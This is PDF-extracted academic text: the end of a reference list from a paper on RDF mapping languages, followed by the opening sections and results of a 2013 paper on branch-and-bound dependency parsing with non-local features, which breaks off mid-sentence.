http://dx.doi.org/10.1002/asna.200811233 https://www.w3.org/TR/r2rml/ http://dx.doi.org/10.1109/AXMEDIS.2008.17 http://dx.doi.org/10.1016/j.tcs.2004.10.033 http://dx.doi.org/10.1007/978-3-319-19066-2_13 http://dx.doi.org/10.5220/0006302900970106 http://dx.doi.org/10.1007/s007780100054 http://dx.doi.org/10.7717/peerj-cs.318 ISWC 2008, Karlsruhe, Germany, October 26–30, 2008. Proceedings. 451–466 DOI 10.1007/978-3-540-88564-1_29. Hanenberg S. 2010. Faith, hope, and love: an essay on software science’s neglect of human factors. In: Cook WR, Clarke S, Rinard MC, eds. Proceedings of the 25th annual ACM SIGPLAN conference on object-oriented programming, systems, languages, and applications, OOPSLA 2010, October 17–21, 2010, Reno/Tahoe, Nevada, USA. ACM, 933–946. Hansen ME, Lumsdaine A, Goldstone RL. 2012. Cognitive architectures: a way forward for the psychology of programming. In: Leavens GT, Edwards J, eds. ACM sympo- sium on new ideas in programming and reflections on software, onward! 2012, part of SPLASH ’12, Tucson, AZ, USA, October 21–26, 2012. ACM, 27–38. Hert M, Reif G, Gall HC. 2011. A comparison of RDB-to-RDF mapping languages. In: Proceedings of the 7th international conference on semantic systems. ACM, 25–32. Heyvaert P, Dimou A, Herregodts A, Verborgh R, Schuurman D, Mannens E, de Walle RV. 2016. RMLEditor: a graph-based mapping editor for linked data mappings. In: The semantic web. Latest advances and new domains—13th international conference, ESWC 2016, Heraklion, Crete, Greece, May 29–June 2, 2016, Proceedings. 709–723 DOI 10.1007/978-3-319-34129-3_43. Heyvaert P, Meester BD, Dimou A, Verborgh R. 2018. Declarative rules for linked data generation at your fingertips!. In: The semantic web: ESWC 2018 satellite events— ESWC 2018 satellite events, Heraklion, Crete, Greece, June 3–7, 2018, Revised Selected Papers. 213–217 DOI 10.1007/978-3-319-98192-5_40. Lefrançois M, Zimmermann A, Bakerally N. 2016. Flexible RDF generation from RDF and heterogeneous data sources with SPARQL-generate. In: Knowledge engineering and knowledge management—EKAW 2016 satellite events, EKM and Drift-an- LOD, Bologna, Italy, November 19–23, 2016, Revised Selected Papers. 131–135 DOI 10.1007/978-3-319-58694-6_16. Lefrançois M, Zimmermann A, Bakerally N. 2017. A SPARQL extension for generating RDF from heterogeneous formats. In: The semantic web—14th international conference, ESWC 2017, Portorož, Slovenia, May 28–June 1, 2017, Proceedings, Part I. 35–50 DOI 10.1007/978-3-319-58068-5_3. Meester BD, Heyvaert P, Verborgh R, Dimou A. 2019. Mapping languages: analysis of comparative characteristics. In: Chaves-Fraga D, Heyvaert P, Priyatna F, Sequeda JF, Dimou A, Jabeen H, Graux D, Sejdiu G, Saleem M, Lehmann J, eds. CEUR workshop proceedings. Joint proceedings of the 1st international workshop on knowledge graph building and 1st International Workshop on Large Scale RDF analytics co-located with 16th extended semantic web conference (ESWC 2019), Portorož, Slovenia, June 3, 2019, vol. 2489. CEUR-WS.org, 37–45. Meester BD, Maroy W, Dimou A, Verborgh R, Mannens E. 2017. RML and FnO: shaping DBpedia declaratively. In: The semantic web: ESWC 2017 satellite events— ESWC 2017 Satellite events, Portorož, Slovenia, May 28–June 1, 2017, Revised Selected Papers. 172–177 DOI 10.1007/978-3-319-70407-4_32. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 25/27 https://peerj.com http://dx.doi.org/10.1007/978-3-540-88564-1_29 http://dx.doi.org/10.1007/978-3-319-34129-3_43 http://dx.doi.org/10.1007/978-3-319-98192-5_40 http://dx.doi.org/10.1007/978-3-319-58694-6_16 http://dx.doi.org/10.1007/978-3-319-58068-5_3 http://dx.doi.org/10.1007/978-3-319-70407-4_32 http://dx.doi.org/10.7717/peerj-cs.318 Michel F, Djimenou L, Faron-Zucker C, Montagnat J. 2015. Translation of relational and non-relational databases into RDF with xR2RML. In: Monfort V, Krempels K, Majchrzak TA, Turk Z, eds. WEBIST 2015—proceedings of the 11th international conference on web information systems and technologies, Lisbon, Portugal, 20–22 May, 2015. SciTePress, 443–454. Michel F, Montagnat J, Zucker CF. 2014. A survey of RDB to RDF translation ap- proaches and tools. PhD thesis, I3S. Available at https://hal.archives-ouvertes.fr/hal- 00903568/file/Rapport_Rech_I3S_v2_-_Michel_et_al_2013_-_A_survey_of_RDB_to_ RDF_translation_approaches_and_tools.pdf . Miletic I, Vujasinovic M, Ivezic N, Marjanovic Z. 2007. Enabling semantic mediation for business applications: XML-RDF, RDF-XML and XSD-RDFS transformations. In: Gonçalves RJ, Müller JP, Mertins K, Zelm M, eds. Enterprise interoperability II: new challenges and approaches. London: Springer, 483–494. Müller H, Cabral L, Morshed A, Shu Y. 2013. From RESTful to SPARQL: a case study on generating semantic sensor data. In: Proceedings of the 6th international workshop on semantic sensor networks co-located with the 12th international semantic web conference (ISWC 2013), Sydney, Australia, October 22nd, 2013. 51–66. Prud’hommeaux E, Labra Gayo JE, Solbrig H. 2014. Shape expressions: an RDF validation and transformation language. In: Proceedings of the 10th international conference on semantic systems, SEM ’14. New York: ACM, 32–40. Reinsel D, Gantz J, Rydning J. 2018. The digitization of the world. From edge to core. Technical report. Seagate, IDC. Available at https://www.seagate.com/files/www- content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf (accessed on 28 October 2019). Sahoo SS, Halb W, Hellmann S, Idehen K, Thibodeau Jr T, Auer S, Sequeda J, Ezzat A. 2009. A survey of current approaches for mapping of relational databases to RDF. W3C RDB2RDF Incubator Group Report 1:113–130. Scharffe F, Bihanic L, Képéklian G, Atemezing G, Troncy R, Cotton F, Gandon F, Villata S, Euzenat J, Fan Z, Bucher B, Hamdi F, Vandenbussche P, Vatant B. 2012. Enabling linked data publication with the datalift platform. In: Semantic cities, papers from the 2012 AAAI workshop, Toronto, Ontario, Canada, July 22–23, 2012. Sequeda JF, Arenas M, Miranker DP. 2012. On directly mapping relational databases to RDF and OWL. In: Proceedings of the 21st world wide web conference 2012, WWW 2012, Lyon, France, April 16–20, 2012. 649–658 DOI 10.1145/2187836.2187924. Slepicka J, Yin C, Szekely PA, Knoblock CA. 2015. KR2RML: an alternative interpre- tation of R2RML for heterogenous sources. In: Hartig O, Sequeda JF, Hogan A, eds. CEUR workshop proceedings. Proceedings of the 6th international workshop on consuming linked data co-located with 14th international semantic web conference (ISWC 2105), Bethlehem, Pennsylvania, USA, October 12th, 2015, vol. 1426. CEUR- WS.org. Sperberg-McQueen CM, Miller E. 2004. On mapping from colloquial XML to RDF using XSLT. In: Extreme Markup Languages R©. Montréal: Online Proceedings (Mulberry Technologies, Inc.). García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 26/27 https://peerj.com https://hal.archives-ouvertes.fr/hal-00903568/file/Rapport_Rech_I3S_v2_-_Michel_et_al_2013_-_A_survey_of_RDB_to_RDF_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal-00903568/file/Rapport_Rech_I3S_v2_-_Michel_et_al_2013_-_A_survey_of_RDB_to_RDF_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal-00903568/file/Rapport_Rech_I3S_v2_-_Michel_et_al_2013_-_A_survey_of_RDB_to_RDF_translation_approaches_and_tools.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf http://dx.doi.org/10.1145/2187836.2187924 http://dx.doi.org/10.7717/peerj-cs.318 Stadler C, Unbehauen J, Westphal P, Sherif MA, Lehmann J. 2015. Simplified RDB2RDF mapping. In: Bizer C, Auer S, Berners-Lee T, Heath T, eds. CEUR workshop proceedings. Proceedings of the workshop on linked data on the web, LDOW 2015, co-located with the 24th international world wide web conference (WWW 2015), Florence, Italy, May 19th, 2015, vol. 1409. CEUR-WS.org. Tandy J, Herman I, Kellogg G. 2015. Generating RDF from tabular data on the web, W3C recommendation 17 December 2015. World Wide Web Consortium. Available at https://www. w3.org/TR/2015/REC-csv2rdf-20151217. Theocharis S, Tsihrintzis GA. 2016. Rdf serialization from JSON data: the case of JSON data in Diavgeia.gov.gr. In: 7th international conference on information, intelligence, systems & applications, IISA 2016, Chalkidiki, Greece, July 13–15, 2016. 1–6 DOI 10.1109/IISA.2016.7785386. Thuy PTT, Lee Y-K, Lee S, Jeong B-S. 2007. Transforming valid XML documents into RDF via RDF schema. In: NWeSP 2007. Third international conference on next generation web services practices, 2007. NWeSP 2007. Piscataway: IEEE, 35–40. Thuy PTT, Lee Y-K, Lee S, Jeong B-S. 2008. Exploiting XML schema for interpreting XML documents as RDF. In: Services computing, 2008. SCC’08. IEEE international conference on, vol. 2. Piscataway: IEEE, 555–558. García-González et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.318 27/27 https://peerj.com https://www. w3.org/TR/2015/REC-csv2rdf-20151217 http://dx.doi.org/10.1109/IISA.2016.7785386 http://dx.doi.org/10.7717/peerj-cs.318 work_cjz5gcmhlzeylneb6avkrv5bui ---- Transactions of the Association for Computational Linguistics, 1 (2013) 37–48. Action Editor: Ryan McDonald. Submitted 11/2012; Revised 2/2013; Published 3/2013. c©2013 Association for Computational Linguistics. Branch and Bound Algorithm for Dependency Parsing with Non-local Features Xian Qian and Yang Liu Computer Science Department The University of Texas at Dallas {qx,yangl}@hlt.utdallas.edu Abstract Graph based dependency parsing is inefficient when handling non-local features due to high computational complexity of inference. In this paper, we proposed an exact and effi- cient decoding algorithm based on the Branch and Bound (B&B) framework where non- local features are bounded by a linear combi- nation of local features. Dynamic program- ming is used to search the upper bound. Ex- periments are conducted on English PTB and Chinese CTB datasets. We achieved competi- tive Unlabeled Attachment Score (UAS) when no additional resources are available: 93.17% for English and 87.25% for Chinese. Parsing speed is 177 words per second for English and 97 words per second for Chinese. Our algo- rithm is general and can be adapted to non- projective dependency parsing or other graph- ical models. 1 Introduction For graph based projective dependency parsing, dy- namic programming (DP) is popular for decoding due to its efficiency when handling local features. It performs cubic time parsing for arc-factored mod- els (Eisner, 1996; McDonald et al., 2005a) and bi- quadratic time for higher order models with richer sibling and grandchild features (Carreras, 2007; Koo and Collins, 2010). However, for models with gen- eral non-local features, DP is inefficient. There have been numerous studies on global in- ference algorithms for general higher order parsing. One popular approach is reranking (Collins, 2000; Charniak and Johnson, 2005; Hall, 2007). It typi- cally has two steps: the low level classifier gener- ates the top k hypotheses using local features, then the high level classifier reranks these candidates us- ing global features. Since the reranking quality is bounded by the oracle performance of candidates, some work has combined candidate generation and reranking steps using cube pruning (Huang, 2008; Zhang and McDonald, 2012) to achieve higher or- acle performance. They parse a sentence in bottom up order and keep the top k derivations for each s- pan using k best parsing (Huang and Chiang, 2005). After merging the two spans, non-local features are used to rerank top k combinations. This approach is very efficient and flexible to handle various non- local features. The disadvantage is that it tends to compute non-local features as early as possible so that the decoder can utilize that information at inter- nal spans, hence it may miss long historical features such as long dependency chains. Smith and Eisner modeled dependency parsing using Markov Random Fields (MRFs) with glob- al constraints and applied loopy belief propaga- tion (LBP) for approximate learning and inference (Smith and Eisner, 2008). Similar work was done for Combinatorial Categorial Grammar (CCG) pars- ing (Auli and Lopez, 2011). They used posterior marginal beliefs for inference to satisfy the tree con- straint: for each factor, only legal messages (satisfy- ing global constraints) are considered in the partition function. A similar line of research investigated the use of integer linear programming (ILP) based parsing (Riedel and Clarke, 2006; Martins et al., 2009). This 37 method is very expressive. It can handle arbitrary non-local features determined or bounded by linear inequalities of local features. For local models, LP is less efficient than DP. The reason is that, DP works on a small number of dimensions in each recursion, while for LP, the popular revised simplex method needs to solve a m dimensional linear system in each iteration (Nocedal and Wright, 2006), where m is the number of constraints, which is quadratic in sentence length for projective dependency pars- ing (Martins et al., 2009). Dual Decomposition (DD) (Rush et al., 2010; Koo et al., 2010) is a special case of Lagrangian re- laxation. It relies on standard decoding algorithms as oracle solvers for sub-problems, together with a simple method for forcing agreement between the different oracles. This method does not need to con- sider the tree constraint explicitly, as it resorts to dy- namic programming which guarantees its satisfac- tion. It works well if the sub-problems can be well defined, especially for joint learning tasks. Howev- er, for the task of dependency parsing, using various non-local features may result in many overlapped sub-problems, hence it may take a long time to reach a consensus (Martins et al., 2011). In this paper, we propose a novel Branch and Bound (B&B) algorithm for efficient parsing with various non-local features. B&B (Land and Doig, 1960) is generally used for combinatorial optimiza- tion problems such as ILP. The difference between our method and ILP is that the sub-problem in ILP is a relaxed LP, which requires a numerical solution, while ours bounds the non-local features by a lin- ear combination of local features and uses DP for decoding as well as calculating the upper bound of the objective function. An exact solution is achieved if the bound is tight. Though in the worst case, time complexity is exponential in sentence length, it is practically efficient especially when adopting a pruning strategy. Experiments are conducted on English PennTree Bank and Chinese Tree Bank 5 (CTB5) with stan- dard train/develop/test split. We achieved 93.17% Unlabeled Attachment Score (UAS) for English at a speed of 177 words per second and 87.25% for Chi- nese at a speed of 97 words per second. 2 Graph Based Parsing 2.1 Problem Definition Given a sentence x = x1,x2, . . . ,xn where xi is the ith word of the sentence, dependency parsing as- signs exactly one head word to each word, so that dependencies from head words to modifiers form a tree. The root of the tree is a special symbol de- noted by x0 which has exactly one modifier. In this paper, we focus on unlabeled projective dependency parsing but our algorithm can be adapted for labeled or non-projective dependency parsing (McDonald et al., 2005b). The inference problem is to search the optimal parse tree y∗ y∗ = arg maxy∈Y(x)ϕ(x,y) where Y(x) is the set of all candidate parse trees of sentence x. ϕ(x,y) is a given score function which is usually decomposed into small parts ϕ(x,y) = ∑ c⊆y ϕc(x) (1) where c is a subset of edges, and is called a factor. For example, in the all grandchild model (Koo and Collins, 2010), the score function can be represented as ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕegh,ehm (x) where the first term is the sum of scores of all edges xh → xm, and the second term is the sum of the scores of all edge chains xg → xh → xm. In discriminative models, the score of a parse tree y is the weighted sum of the fired feature functions, which can be represented by the sum of the factors ϕ(x,y) = wT f (x,y) = ∑ c⊆y wT f (x,c) = ∑ c⊆y ϕc(x) where f (x,c) is the feature vector that depends on c. For example, we could define a feature for grand- child c = {egh,ehm} f(x,c) =    1 if xg = would ∧ xh = be ∧xm = happy ∧ c is selected 0 otherwise 38 2.2 Dynamic Programming for Local Models In first order models, all factors c in Eq(1) contain a single edge. The optimal parse tree can be derived by DP with running time O(n3) (Eisner, 1996). The algorithm has two types of structures: complete s- pan, which consists of a headword and its descen- dants on one side, and incomplete span, which con- sists of a dependency and the region between the head and modifier. It starts at single word spans, and merges the spans in bottom up order. For second order models, the score function ϕ(x,y) adds the scores of siblings (adjacent edges with a common head) and grandchildren ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕehm,egh (x) + ∑ ehm,ehs∈y ϕehm,ehs (x) There are two versions of second order models, used respectively by Carreras (2007) and Koo et al. (2010). The difference is that Carreras’ only con- siders the outermost grandchildren, while Koo and Collin’s allows all grandchild features. Both models permit O(n4) running time. Third-order models score edge triples such as three adjacent sibling modifiers, or grand-siblings that score a word, its modifier and its adjacent grand- children, and the inference complexity is O(n4) (Koo and Collins, 2010). In this paper, for all the factors/features that can be handled by DP, we call them the local fac- tors/features. 3 The Proposed Method 3.1 Basic Idea For general high order models with non-local fea- tures, we propose to use Branch and Bound (B&B) algorithm to search the optimal parse tree. A B&B algorithm has two steps: branching and bounding. The branching step recursively splits the search s- pace Y(x) into two disjoint subspaces Y(x) = Y1 ∪ Y2 by fixing assignment of one edge. For each subspace Yi, the bounding step calculates the upper bound of the optimal parse tree score in the sub- space: UBYi ≥ maxy∈Yi ϕ(x,y). If this bound is no more than any obtained parse tree score UBYi ≤ ϕ(x,y′), then all parse trees in subspace Yi are no more optimal than y′, and Yi could be pruned safely. The efficiency of B&B depends on the branching strategy and upper bound computation. For exam- ple, Sun et al. (2012) used B&B for MRFs, where they proposed two branching strategies and a novel data structure for efficient upper bound computation. Klenner and Ailloud (2009) proposed a variation of Balas algorithm (Balas, 1965) for coreference reso- lution, where candidate branching variables are sort- ed by their weights. Our bounding strategy is to find an upper bound for the score of each non-local factor c containing multiple edges. The bound is the sum of new scores of edges in the factor plus a constant ϕc(x) ≤ ∑ e∈c ψe(x) + αc Based on the new scores {ψe(x)} and constants {αc}, we define the new score of parse tree y ψ(x,y) = ∑ c⊆y ( ∑ e∈c ψe(x) + αc ) Then we have ψ(x,y) ≥ ϕ(x,y), ∀y ∈ Y(x) The advantage of such a bound is that, it is the sum of new edge scores. Hence, its optimum tree maxy∈Y(x) ψ(x,y) can be found by DP, which is the upper bound of maxy∈Y(x) ϕ(x,y), as for any y ∈ Y(x), ψ(x,y) ≥ ϕ(x,y). 3.2 The Upper Bound Function In this section, we derive the upper bound function ψ(x,y) described above. To simplify notation, we drop x throughout the rest of the paper. Let zc be a binary variable indicating whether factor c is se- lected in the parse tree. We reformulate the score function in Eq(1) as ϕ(y) ≡ ϕ(z) = ∑ c ϕczc (2) 39 Correspondingly, the tree constraint is replaced by z ∈ Z. Then the parsing task is z∗ = arg maxz∈Zϕczc (3) Notice that, for any zc, we have zc = min e∈c ze which means that factor c appears in parse tree if and only if all its edges {e|e ∈ c} are selected in the tree. Here ze is short for z{e} for simplicity. Our bounding method is based on the following fact: for a set {a1,a2, . . .ar} (aj denotes the jth el- ement) , its minimum min{aj} = min p∈∆ ∑ j pjaj (4) where ∆ is probability simplex ∆ = {p|pj ≥ 0, ∑ j pj = 1} We discuss the bound for ϕczc in two cases: ϕc ≥ 0 and ϕc < 0. If ϕc ≥ 0, we have ϕczc = ϕc min e∈c ze = ϕc min pc∈∆ ∑ e∈c pecze = min pc∈∆ ∑ e∈c ϕcp e cze The second equation comes from Eq(4). For sim- plicity, let gc(pc,z) = ∑ e∈c ϕcp e cze with domain domgc = {pc ∈ ∆; ze ∈ {0, 1}, ∀e ∈ c}. Then we have ϕczc = min pc gc(pc,z) (5) If ϕc < 0, we have two upper bounds. One is commonly used in ILP when all the variables are bi- nary a∗ = min j {aj}rj=1 ⇔ a∗ ≤ aj a∗ ≥ ∑ j aj − (r − 1) According to the last inequality, we have the upper bound for negative scored factors ϕczc ≤ ϕc ( ∑ e∈c ze − (rc − 1) ) (6) where rc is the number of edges in c. For simplicity, we use the notation σc(z) = ϕc ( ∑ e∈c ze − (rc − 1) ) The other upper bound when ϕc < 0 is simple ϕczc ≤ 0 (7) Notice that, for any parse tree, one of the upper bounds must be tight. Eq(6) is tight if c appears in the parse tree: zc = 1, otherwise Eq(7) is tight. Therefore ϕczc = min {σc(z), 0} Let hc(pc,z) = p 1 cσc(z) + p 2 c · 0 with domhc = {pc ∈ ∆; ze ∈ {0, 1}, ∀e ∈ c}. According to Eq(4), we have ϕczc = min pc hc(pc,z) (8) Let ψ(p,z) = ∑ c,ϕc≥0 gc(pc,z) + ∑ c,ϕc<0 hc(pc,z) Minimize ψ with respect to p, we have min p ψ(p,z) = min p   ∑ c,ϕc≥0 gc(pc,z) + ∑ c,ϕc<0 hc(pc,z)   = ∑ c,ϕc≥0 min pc gc(pc,z) + ∑ c,ϕc<0 min pc hc(pc,z) = ∑ c,ϕc≥0 ϕczc + ∑ c,ϕc<0 ϕczc = ϕ(z) The second equation holds since, for any two fac- tors, c and c′, gc (or hc) and gc′ (or hc′ ) are separable. The third equation comes from Eq(5) and Eq(8). Based on this, we have the following proposition: 40 Proposition 1. For any p,pc ∈ ∆, and z ∈ Z, ψ(p,z) ≥ ϕ(z). Therefore, ψ(p,z) is an upper bound function of ϕ(z). Furthermore, fixing p, ψ(p,z) is a linear func- tion of ze , see Eq(5) and Eq(8), variables zc for large factors are eliminated. Hence z′ = arg maxzψ(p,z) can be solved efficiently by DP. Because ψ(p,z′) ≥ ψ(p,z∗) ≥ ϕ(z∗) ≥ ϕ(z′) after obtaining z′ , we get the upper bound and lower bound of ϕ(z∗): ψ(p,z′) and ϕ(z′). The upper bound is expected to be as tight as pos- sible. Using min-max inequality, we get max z∈Z ϕ(z) = max z∈Z min p ψ(p,z) ≤ min p max z∈Z ψ(p,z) which provides the tightest upper bound of ϕ(z∗). Since ψ is not differentiable w.r.t p, projected sub-gradient (Calamai and Moré, 1987; Rush et al., 2010) is used to search the saddle point. More specifically, in each iteration, we first fix p and search z using DP, then we fix z and update p by pnew = P∆ ( p + ∂ψ ∂p α ) where α > 0 is the step size in line search, function P∆(q) denotes the projection of q onto the proba- bility simplex ∆. In this paper, we use Euclidean projection, that is P∆(q) = min p∈∆ ∥p − q∥2 which can be solved efficiently by sorting (Duchi et al., 2008). 3.3 Branch and Bound Based Parsing As discussed in Section 3.1, the B&B recursive pro- cedure yields a binary tree structure called Branch and Bound tree. Each node of the B&B tree has some fixed ze, specifying some must-select edges and must-remove edges. The root of the B&B tree has no constraints, so it can produce all possible parse trees including z∗. Each node has two chil- dren. One adds a constraint ze = 1 for a free edge z =e1 0 1 0 1 0 1z =e2 ψ φ =9 =4 ψ<LB ψ φ =8 =5 ψ φ =7 =4 ψ φ =7 =4 ψ φ =7 =5 ψ φ =4 =3 ψ φ =6 =2 min p max z∈Z ze1 =0 ze2 =1 ψ(p,z) 6 Figure 1: A part of B&B tree. ϕ,ψ are short for ϕ(z′) and ψ(p′,z′) respectively. For each node, some edges of the parse tree are fixed. All parse trees that satisfy the fixed edges compose the subset of S ⊆ Z. A min-max problem is solved to get the upper bound and lower bound of the optimal parse tree over S. Once the upper bound ψ is less than LB, the node is removed safely. e and the other fixes ze = 0. We can explore the search space {z|ze ∈ {0, 1}} by traversing the B&B tree in breadth first order. Let S ⊆ Z be subspace of parse trees satisfying the constraint, i.e., in the branch of the node. For each node in B&B tree, we solve p′,z′ = arg min p max z∈S ψ(p,z) to get the upper bound and lower bound of the best parse tree in S. A global lower bound LB is main- tained which is the maximum of all obtained lower bounds. If the upper bound of the current node is lower than the global lower bound, the node can be pruned from the B&B tree safely. An example is shown in Figure 1. When the upper bound is not tight: ψ > LB, we need to choose a good branching variable to gener- ate the child nodes. Let G(z′) = ψ(p′,z′) − ϕ(z′) denote the gap between the upper bound and lower bound. This gap is actually the accumulated gaps of all factors c. Let Gc be the gap of c Gc = { gc(p ′ c,z ′) − ϕcz′c if ϕc ≥ 0 hc(p ′ c,z ′) − ϕcz′c if ϕc < 0 41 We choose the branching variable heuristically: for each edge e, we define its gap as the sum of the gaps of factors that contain it Ge = ∑ c,e∈c Gc The edge with the maximum gap is selected as the branching variable. Suppose there are N nodes on a level of B&B tree, and correspondingly, we get N branching vari- ables, among which, we choose the one with the highest lower bound as it likely reaches the optimal value faster. 3.4 Lower Bound Initialization A large lower bound is critical for efficient pruning. In this section, we discuss an alternative way to ini- tialize the lower bound LB. We apply the similar trick to get the lower bound function of ϕ(z). Similar to Eq(8), for ϕc ≥ 0, we have ϕczc = max{ϕc ( ∑ e∈c ze − (rc − 1) ) , 0} = max{σc(z), 0} Using the fact that max{aj} = max p∈∆ ∑ j pjaj we have ϕczc = max pc∈∆ p1cσc(z) + p 2 c · 0 = max pc hc(pc,z) For ϕc < 0, we have ϕczc = max e∈c {ϕcze} = max pc∈∆ ∑ e∈c pecϕcze = max pc gc(pc,z) Put the two cases together, we get the lower bound function π(p,z) = ∑ c,ϕc≥0 hc(pc,z) + ∑ c,ϕc<0 gc(pc,z) Algorithm 1 Branch and Bound based parsing Require: {ϕc} Ensure: Optimal parse tree z∗ Solve p∗,z∗ = arg maxp,zπ(p,z) Initialize S = {Z}, LB = π(p∗,z∗) while S ̸= ∅ do Set S′ = ∅{nodes that survive from pruning} foreach S ∈ S Solve minp maxz ψ(p,z) to get LBS,UBS LB = max{LB,LBS∈S }, update z∗ foreach S ∈ S, add S to S′, if UBS > LB Select a branching variable ze. Clear S = ∅ foreach S ∈ S′ Add S1 = {z|z ∈ S,ze = 1} to S Add S2 = {z|z ∈ S,ze = 0} to S. end while For any p,pc ∈ ∆,z ∈ Z π(p,z) ≤ ϕ(z) π(p,z) is not concave, however, we could alterna- tively optimize z and p to get a good approximation, which provides a lower bound for ϕ(z∗). 3.5 Summary We summarize our B&B algorithm in Algorithm 1. It is worth pointing out that so far in the above description, we have used the assumption that the backbone DP uses first order models, however, the backbone DP can be the second or third order ver- sion. The difference is that, for higher order DP, higher order factors such as adjacent siblings, grand- children are directly handled as local factors. In the worst case, all the edges are selected for branching, and the complexity grows exponentially in sentence length. However, in practice, it is quite efficient, as we will show in the next section. 4 Experiments 4.1 Experimental Settings The datasets we used are the English Penn Tree Bank (PTB) and Chinese Tree Bank 5.0 (CTB5). We use the standard train/develop/test split as described in Table 1. We extracted dependencies using Joakim Nivre’s Penn2Malt tool with standard head rules: Yamada and Matsumoto’s (Yamada and Matsumoto, 2003) 42 Train Develop Test PTB sec. 2-21 sec. 22 sec. 23 CTB5 sec. 001-815 sec. 886-931 sec. 816-885 1001-1136 1148-1151 1137-1147 Table 1: Data split in our experiment for English, and Zhang and Clark’s (Zhang and Clark, 2008) for Chinese. Unlabeled attachment s- core (UAS) is used to evaluate parsing quality1. The B&B parser is implemented with C++. All the ex- periments are conducted on the platform Intel Core i5-2500 CPU 3.30GHz. 4.2 Baseline: DP Based Second Order Parser We use the dynamic programming based second or- der parser (Carreras, 2007) as the baseline. Aver- aged structured perceptron (Collins, 2002) is used for parameter estimation. We determine the number of iterations on the validation set, which is 6 for both corpora. For English, we train the POS tagger using linear chain perceptron on training set, and predict POS tags for the development and test data. The parser is trained using the automatic POS tags generated by 10 fold cross validation. For Chinese, we use the gold standard POS tags. We use five types of features: unigram features, bigram features, in-between features, adjacent sib- ling features and outermost grand-child features. The first three types of features are firstly introduced by McDonald et al. (2005a) and the last two type- s of features are used by Carreras (2007). All the features are the concatenation of surrounding words, lower cased words (English only), word length (Chi- nese only), prefixes and suffixes of words (Chinese only), POS tags, coarse POS tags which are derived from POS tags using a simple mapping table, dis- tance between head and modifier, direction of edges. For English, we used 674 feature templates to gener- ate large amounts of features, and finally got 86.7M non-zero weighted features after training. The base- line parser got 92.81% UAS on the testing set. For Chinese, we used 858 feature templates, and finally got 71.5M non-zero weighted features after train- 1For English, we follow Koo and Collins (2010) and ignore any word whose gold-standard POS tag is one of { “ ” : , .}. For Chinese, we ignore any word whose POS tag is PU. ing. The baseline parser got 86.89% UAS on the testing set. 4.3 B&B Based Parser with Non-local Features We use the baseline parser as the backbone of our B&B parser. We tried different types of non-local features as listed below: • All grand-child features. Notice that this fea- ture can be handled by Koo’s second order model (Koo and Collins, 2010) directly. • All great grand-child features. • All sibling features: all the pairs of edges with common head. An example is shown in Fig- ure 2. • All tri-sibling features: all the 3-tuples of edges with common head. • Comb features: for any word with more than 3 consecutive modifiers, the set of all the edges from the word to the modifiers form a comb.2 • Hand crafted features: We perform cross val- idation on the training data using the baseline parser, and designed features that may correc- t the most common errors. We designed 13 hand-craft features for English in total. One ex- ample is shown in Figure 3. For Chinese, we did not add any hand-craft features, as the er- rors in the cross validation result vary a lot, and we did not find general patterns to fix them. 4.4 Implementation Details To speed up the solution of the min-max subprob- lem, for each node in the B&B tree, we initialize p with the optimal solution of its parent node, since the child node fixes only one additional edge, its op- timal point is likely to be closed to its parent’s. For the root node of B&B tree, we initialize pec = 1 rc for factors with non-negative weights and p1c = 0 for 2In fact, our algorithm can deal with non-consecutive mod- ifiers; however, in such cases, factor detection (detect regular expressions like x1. ∗ x2. ∗ . . . ) requires the longest com- mon subsequence algorithm (LCS), which is time-consuming if many comb features are generated. Similar problems arise for sub-tree features, which may contain many non-consecutive words. 43 c0 c1 c2 c3c0 h c0 c1c0 h c0 c2c0 h c0 c3c0 h c1 c2h c2 c3h c1 c3h second order higher order Figure 2: An example of all sibling features. Top: a sub-tree; Bottom: extracted sibling features. Ex- isting higher order DP systems can not handle the siblings on both sides of head. regulation occurs through inaction , rather than through ... Figure 3: An example of hand-craft feature: for the word sequence A . . . rather than A, where A is a preposition, the first A is the head of than, than is the head of rather and the second A. negative weighted factors. Step size α is initialized with maxc,ϕc ̸=0{ 1|ϕc| }, as the vector p is bounded in a unit box. α is updated using the same strategy as Rush et al. (2010). Two stopping criteria are used. One is 0 ≤ ψold − ψnew ≤ ϵ, where ϵ > 0 is a given precision3. The other checks if the bound is tight: UB = LB. Because all features are boolean (note that they can be integer), their weights are integer during each perceptron update, hence the scores of parse trees are discrete. The minimal gap between different scores is 1 N×T after averaging, where N is the number of training samples, and T is the itera- tion number for perceptron training. Therefore the upper bound can be tightened as UB = ⌊NTψ⌋ NT . During testing, we use the pre-pruning method as used in Martins et al. (2009) for both datasets to bal- ance parsing quality and speed. This method uses a simple classifier to select the top k candidate head- s for each word and exclude the other heads from search space. In our experiment, we set k = 10. 3we use ϵ = 10−8 in our implementation System PTB CTB Our baseline 92.81 86.89 B&B +all grand-child 92.97 87.02 +all great grand-child 92.78 86.77 +all sibling 93.00 87.05 +all tri-sibling 92.79 86.81 +comb 92.86 86.91 +hand craft 92.89 N/A +all grand-child + all sibling + com- b + hand craft 93.17 87.25 3rd order re-impl. 93.03 87.07 TurboParser (reported) 92.62 N/A TurboParser (our run) 92.82 86.05 Koo and Collins (2010) 93.04 N/A Zhang and McDonald (2012) 93.06 86.87 Zhang and Nivre (2011) 92.90 86.00 System integration Bohnet and Kuhn (2012) 93.39 87.5 Systems using additional resources Suzuki et al. (2009) 93.79 N/A Koo et al. (2008) 93.5 N/A Chen et al. (2012) 92.76 N/A Table 2: Comparison between our system and the- state-of-art systems. 4.5 Main Result Experimental results are listed in Table 2. For com- parison, we also include results of representative state-of-the-art systems. For the third order pars- er, we re-implemented Model 1 (Koo and Collins, 2010), and removed the longest sentence in the CTB dataset, which contains 240 words, due to the O(n4) space complexity 4. For ILP based parsing, we used TurboParser5, a speed-optimized parser toolkit. We trained full models (which use all grandchild fea- tures, all sibling features and head bigram features (Martins et al., 2011)) for both datasets using its de- fault settings. We also list the performance in its 